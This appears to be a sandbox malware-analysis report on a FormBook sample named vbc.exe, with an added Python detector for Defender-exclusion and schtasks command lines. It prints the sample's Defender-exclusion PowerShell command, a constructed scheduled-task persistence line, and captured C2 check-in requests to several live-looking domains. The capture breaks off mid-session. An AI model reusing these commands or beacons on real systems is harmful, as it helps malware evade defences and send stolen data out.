                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211109125607..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 921702 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe..Process ID: 6604..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211109125607..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe..**********************..Windows PowerShell transcript start..Start time: 20211109130015..Username: computer\user..RunA
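The transcript above records the single command the PowerShell host was started with: Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, a Microsoft Defender exclusion for the byte-identical self-copy of vbc.exe listed under dropped files (same MD5 and SHA-256 as the sample). The Host Application path reads System32 while the dropped-file entry attributes the transcript to SysWOW64\...\powershell.exe; that is WOW64 file-system redirection for a 32-bit host process, not a second PowerShell. The detector below is an added example for this report, not Joe Sandbox code and not the Sigma rules the summary cites ("Powershell Defender Exclusion", "Suspicius Add Task From User AppData Temp"); its regexes are this example's own approximation of those rules. The transcript sample is constructed from the preview, and the schtasks command line is constructed too: the report confirms schtasks use and the Temp XML but does not print that command line, so the task name in it is an assumption.

```python
"""Flag Defender-exclusion and schtasks-from-Temp command lines in PowerShell
transcripts and process-creation logs.

Added example for this report; not Joe Sandbox code and not the Sigma rules the
report cites. The patterns are this example's own approximations of those rules.
"""
import re

# Constructed from the PowerShell_transcript preview above ('..' in the preview
# stands for CRLF). Only the fields the checks use are reproduced.
SAMPLE_TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Start time: 20211109125607
Username: computer\\user
RunAs User: computer\\user
Machine: 921702 (Microsoft Windows NT 10.0.17134.0)
Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\uZlkYhlkeLeaKC.exe
Process ID: 6604
**********************
Command start time: 20211109125607
**********************
PS>Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\uZlkYhlkeLeaKC.exe
**********************
"""

# Constructed process-creation line. ASSUMPTION: the report confirms schtasks
# use and the Temp XML but prints no schtasks command line; the /TN is made up.
SAMPLE_SCHTASKS_LINE = (
    'schtasks.exe /Create /TN "uZlkYhlkeLeaKC" /XML '
    '"C:\\Users\\user\\AppData\\Local\\Temp\\tmpAA68.tmp"'
)

MPPREF = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.I)
EXCLUSION = re.compile(
    r"-Exclusion(Path|Process|Extension)\s+(?:([\"'])(.+?)\2|(\S+))", re.I)
SCHTASKS_XML = re.compile(
    r"\bschtasks(?:\.exe)?\b.*?/create\b.*?/xml\s+(?:\"([^\"]+)\"|(\S+))", re.I)
USER_WRITABLE = re.compile(
    r"(?:\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\|"
    r"%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%)", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|%TEMP%|%TMP%", re.I)
# Leading host executable in the 'Host Application:' line, e.g. '...\powershell.exe '
HOST_PREFIX = re.compile(r"^\S*powershell(?:\.exe)?\s+", re.I)


def commands_from_transcript(text: str) -> list:
    """Extract command lines from a transcript: the 'Host Application:' header
    (the full launch command line, host executable stripped) and every 'PS>'
    prompt line. Deduplicated in order, because both carry the same command when
    PowerShell is launched with the command as its argument, as it is here."""
    seen, commands = set(), []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Host Application:"):
            cmd = HOST_PREFIX.sub("", line.split(":", 1)[1].strip())
        elif line.startswith("PS>"):
            cmd = line[3:].strip()
        else:
            continue
        if cmd and cmd not in seen:
            seen.add(cmd)
            commands.append(cmd)
    return commands


def scan_command(cmd: str) -> list:
    """Return rule hits for one command line as dicts (rule, kind, target, command)."""
    hits = []
    if MPPREF.search(cmd):
        for m in EXCLUSION.finditer(cmd):
            target = m.group(3) or m.group(4)
            rule = ("defender_exclusion_user_writable" if USER_WRITABLE.search(target)
                    else "defender_exclusion")
            hits.append({"rule": rule, "kind": m.group(1), "target": target, "command": cmd})
    m = SCHTASKS_XML.search(cmd)
    if m:
        xml_path = m.group(1) or m.group(2)
        rule = ("schtasks_xml_from_temp" if TEMP_DIR.search(xml_path)
                else "schtasks_create_from_xml")
        hits.append({"rule": rule, "kind": "XML", "target": xml_path, "command": cmd})
    return hits


def scan_transcript(text: str) -> list:
    """Run scan_command over every command a transcript records."""
    hits = []
    for cmd in commands_from_transcript(text):
        hits.extend(scan_command(cmd))
    return hits


if __name__ == "__main__":
    for hit in scan_transcript(SAMPLE_TRANSCRIPT) + scan_command(SAMPLE_SCHTASKS_LINE):
        print(f"{hit['rule']:34} {hit['kind']:9} {hit['target']}")
```

The same scan_command works on Sysmon event 1 or Security 4688 command lines; the transcript reader exists because transcription is the one place a Defender exclusion added from PowerShell leaves a plain-text record even when script-block logging is off.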

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.907277852559704
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:vbc.exe
                                            File size:368640
                                            MD5:c4a1bdd685e346b7604f93357a922875
                                            SHA1:6b8fccadcf1977f5850faa1c47617343fafc0ff4
                                            SHA256:728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
                                            SHA512:15fd260d342ab48a0a23293ee49dc50150b0edaabf869f9e2a80bb7946fe5483cb4d89037352ad76008ffca703b93a68361f1d4ffd1e09f37996d5df47bc6ca3
                                            SSDEEP:6144:hC9EDghMkMs4P2CW2RT9cERCtbjqg2vcy8a9KI75uhPLTDcfAYGQLomQVHb:h1DghTjPymtvqg4ya9R75AzOAcomQV7
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(-.a................................. ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            General

                                            Entrypoint:0x45b50e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x618A2D28 [Tue Nov 9 08:11:20 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]   ; FF 25 00 20 40 00: indirect jmp through the IAT slot at 0x402000 (ImageBase 0x400000 + IAT RVA 0x2000), whose single import is mscoree.dll!_CorExeMain; this 6-byte stub is the standard native entry point of a .NET executable
                                            add byte ptr [eax], al      ; repeated 97 times in the listing: the 00 00 padding that follows the stub, not code
                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x5b4c0          0x4b          .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5c000          0x5d8         .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5e000          0xc           .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x59514 | 0x59600 | False | 0.893217329545 | data | 7.9203967863 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x5c000 | 0x5d8 | 0x600 | False | 0.431640625 | data | 4.16950249458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x5e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x5c0a0 | 0x34c | data | |
RT_MANIFEST | 0x5c3ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

DLL | Import
mscoree.dll | _CorExeMain

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright usda 2011
Assembly Version | 1.0.0.0
InternalName | ICollecti.exe
FileVersion | 1.0.0.0
CompanyName | usda
LegalTrademarks |
Comments |
ProductName | HidLib.SampleApp
ProductVersion | 1.0.0.0
FileDescription | HidLib.SampleApp
OriginalFilename | ICollecti.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/09/21-12:57:17.665894 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49794 | 80 | 192.168.2.7 | 44.227.65.245
11/09/21-12:57:17.665894 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49794 | 80 | 192.168.2.7 | 44.227.65.245
11/09/21-12:57:17.665894 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49794 | 80 | 192.168.2.7 | 44.227.65.245
11/09/21-12:57:29.013759 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.2.7 | 172.67.188.247
11/09/21-12:57:29.013759 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.2.7 | 172.67.188.247
11/09/21-12:57:29.013759 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49816 | 80 | 192.168.2.7 | 172.67.188.247
11/09/21-12:57:34.283009 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49818 | 34.102.136.180 | 192.168.2.7
11/09/21-12:57:39.595240 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.2.7 | 101.132.116.91
11/09/21-12:57:39.595240 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.2.7 | 101.132.116.91
11/09/21-12:57:39.595240 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.2.7 | 101.132.116.91
11/09/21-12:57:48.252391 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.7 | 8.8.8.8
11/09/21-12:57:49.299373 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.7 | 8.8.8.8
11/09/21-12:58:02.641444 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49848 | 34.102.136.180 | 192.168.2.7
11/09/21-12:58:08.507989 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49850 | 103.118.81.108 | 192.168.2.7
11/09/21-12:58:13.678079 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49851 | 34.102.136.180 | 192.168.2.7

Network Port Distribution

• Total Packets: 57
• 80 (HTTP)
• 53 (DNS)
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Nov 9, 2021 12:57:48.252391100 CET | 192.168.2.7 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
Nov 9, 2021 12:57:49.299372911 CET | 192.168.2.7 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 9, 2021 12:57:17.065556049 CET | 192.168.2.7 | 8.8.8.8 | 0xce70 | Standard query (0) | www.sharpstead.com | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:22.879528999 CET | 192.168.2.7 | 8.8.8.8 | 0x76b1 | Standard query (0) | www.maikoufarm.com | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:28.956065893 CET | 192.168.2.7 | 8.8.8.8 | 0x349c | Standard query (0) | www.septemberstockevent200.com | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:34.122539997 CET | 192.168.2.7 | 8.8.8.8 | 0x3b78 | Standard query (0) | www.joye.club | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:39.320169926 CET | 192.168.2.7 | 8.8.8.8 | 0xfbda | Standard query (0) | www.mmj0115.xyz | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:45.131288052 CET | 192.168.2.7 | 8.8.8.8 | 0xc50d | Standard query (0) | www.watermountsteam.top | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:46.126441956 CET | 192.168.2.7 | 8.8.8.8 | 0xc50d | Standard query (0) | www.watermountsteam.top | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:47.157723904 CET | 192.168.2.7 | 8.8.8.8 | 0xc50d | Standard query (0) | www.watermountsteam.top | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:52.316186905 CET | 192.168.2.7 | 8.8.8.8 | 0x28ab | Standard query (0) | www.leewaysvcs.com | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:57.381405115 CET | 192.168.2.7 | 8.8.8.8 | 0x9bdc | Standard query (0) | www.miabellavita.com | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:02.464620113 CET | 192.168.2.7 | 8.8.8.8 | 0x2f30 | Standard query (0) | www.yungbredda.com | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:07.645164967 CET | 192.168.2.7 | 8.8.8.8 | 0xa6b4 | Standard query (0) | www.joy1263.com | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:13.521158934 CET | 192.168.2.7 | 8.8.8.8 | 0x527b | Standard query (0) | www.mattlambert.xyz | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:18.693773031 CET | 192.168.2.7 | 8.8.8.8 | 0xd29c | Standard query (0) | www.annikadaniel.love | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 9, 2021 12:57:17.257793903 CET | 8.8.8.8 | 192.168.2.7 | 0xce70 | No error (0) | www.sharpstead.com | | 44.227.65.245 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:17.257793903 CET | 8.8.8.8 | 192.168.2.7 | 0xce70 | No error (0) | www.sharpstead.com | | 44.227.76.166 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:23.134397984 CET | 8.8.8.8 | 192.168.2.7 | 0x76b1 | No error (0) | www.maikoufarm.com | | 118.27.122.222 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:28.979376078 CET | 8.8.8.8 | 192.168.2.7 | 0x349c | No error (0) | www.septemberstockevent200.com | | 172.67.188.247 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:28.979376078 CET | 8.8.8.8 | 192.168.2.7 | 0x349c | No error (0) | www.septemberstockevent200.com | | 104.21.65.66 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:34.145211935 CET | 8.8.8.8 | 192.168.2.7 | 0x3b78 | No error (0) | www.joye.club | joye.club | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:57:34.145211935 CET | 8.8.8.8 | 192.168.2.7 | 0x3b78 | No error (0) | joye.club | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:39.345231056 CET | 8.8.8.8 | 192.168.2.7 | 0xfbda | No error (0) | www.mmj0115.xyz | | 101.132.116.91 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:47.272138119 CET | 8.8.8.8 | 192.168.2.7 | 0xc50d | Server failure (2) | www.watermountsteam.top | none | none | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:48.252280951 CET | 8.8.8.8 | 192.168.2.7 | 0xc50d | Server failure (2) | www.watermountsteam.top | none | none | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:49.299220085 CET | 8.8.8.8 | 192.168.2.7 | 0xc50d | Server failure (2) | www.watermountsteam.top | none | none | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:52.362221003 CET | 8.8.8.8 | 192.168.2.7 | 0x28ab | Name error (3) | www.leewaysvcs.com | none | none | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:57.404184103 CET | 8.8.8.8 | 192.168.2.7 | 0x9bdc | No error (0) | www.miabellavita.com | | 104.21.4.114 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:57:57.404184103 CET | 8.8.8.8 | 192.168.2.7 | 0x9bdc | No error (0) | www.miabellavita.com | | 172.67.132.7 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:02.505490065 CET | 8.8.8.8 | 192.168.2.7 | 0x2f30 | No error (0) | www.yungbredda.com | yungbredda.com | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:58:02.505490065 CET | 8.8.8.8 | 192.168.2.7 | 0x2f30 | No error (0) | yungbredda.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET | 8.8.8.8 | 192.168.2.7 | 0xa6b4 | No error (0) | www.joy1263.com | s1.amhttpproxy.com | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET | 8.8.8.8 | 192.168.2.7 | 0xa6b4 | No error (0) | s1.amhttpproxy.com | g380-5-g-1544770457451j.greycdn.net | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET | 8.8.8.8 | 192.168.2.7 | 0xa6b4 | No error (0) | g380-5-g-1544770457451j.greycdn.net | y01-p380-01-def-006.greycdn.net | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET | 8.8.8.8 | 192.168.2.7 | 0xa6b4 | No error (0) | y01-p380-01-def-006.greycdn.net | z010-gp-hk-06-75-adfh31.greycdn.net | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:58:07.974133968 CET | 8.8.8.8 | 192.168.2.7 | 0xa6b4 | No error (0) | z010-gp-hk-06-75-adfh31.greycdn.net | | 103.118.81.108 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:13.542715073 CET | 8.8.8.8 | 192.168.2.7 | 0x527b | No error (0) | www.mattlambert.xyz | mattlambert.xyz | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:58:13.542715073 CET | 8.8.8.8 | 192.168.2.7 | 0x527b | No error (0) | mattlambert.xyz | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 9, 2021 12:58:18.740915060 CET | 8.8.8.8 | 192.168.2.7 | 0xd29c | No error (0) | www.annikadaniel.love | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001)
Nov 9, 2021 12:58:18.740915060 CET | 8.8.8.8 | 192.168.2.7 | 0xd29c | No error (0) | ghs.googlehosted.com | | 142.250.203.115 | A (IP address) | IN (0x0001)
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49794 | 44.227.65.245 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 9, 2021 12:57:17.665894032 CET | 5058 | OUT | GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1
Host: www.sharpstead.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 9, 2021 12:57:17.870632887 CET | 5100 | IN | HTTP/1.1 307 Temporary Redirect
Server: openresty
Date: Tue, 09 Nov 2021 11:57:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 168
Connection: close
Location: http://sharpstead.com
X-Frame-Options: sameorigin
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49815 | 118.27.122.222 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 9, 2021 12:57:23.410603046 CET | 5345 | OUT | GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1
Host: www.maikoufarm.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 9, 2021 12:57:23.685393095 CET | 5346 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 09 Nov 2021 11:57:23 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49816 | 172.67.188.247 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 9, 2021 12:57:29.013758898 CET | 5347 | OUT | GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1
Host: www.septemberstockevent200.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 9, 2021 12:57:29.071464062 CET | 5347 | IN | HTTP/1.1 302 Moved Temporarily
Date: Tue, 09 Nov 2021 11:57:29 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Location: https://signup.stansberryresearch.com/?cid=MKT575714&eid=MKT576461
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eaxnl2g1qB4EKNecpVvmEZi95fe%2FGSpvnSEEKHNf8qw46BnT2fmXbf9fgVuI9f4GBFQvmjjnPSXjH%2BlqUzqjL3c0AeVf%2BqzaGX0zYcrmgmh7iKR6zHtTA8vRG1dd%2BMA%2FJBGDLVQI0PIAlJ4zcKEZgmU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ab6dd206aed4c32-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.74981834.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 9, 2021 12:57:34.168477058 CET5355OUTGET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.joye.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:34.283009052 CET | 5356 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Tue, 09 Nov 2021 11:57:34 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6182ae77-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            4 | 192.168.2.7 | 49821 | 101.132.116.91 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Nov 9, 2021 12:57:39.595240116 CET | 5368 | OUT | GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.mmj0115.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:40.172657967 CET | 5368 | OUT | GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.mmj0115.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:40.442859888 CET | 5368 | IN | HTTP/1.1 404 Not Found
                                            Date: Tue, 09 Nov 2021 11:57:40 GMT
                                            Server: Apache
                                            X-Frame-Options: SAMEORIGIN
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            5 | 192.168.2.7 | 49847 | 104.21.4.114 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Nov 9, 2021 12:57:57.423017979 CET | 5431 | OUT | GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.miabellavita.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:57:57.453866005 CET | 5431 | IN | HTTP/1.1 301 Moved Permanently
                                            Date: Tue, 09 Nov 2021 11:57:57 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 09 Nov 2021 12:57:57 GMT
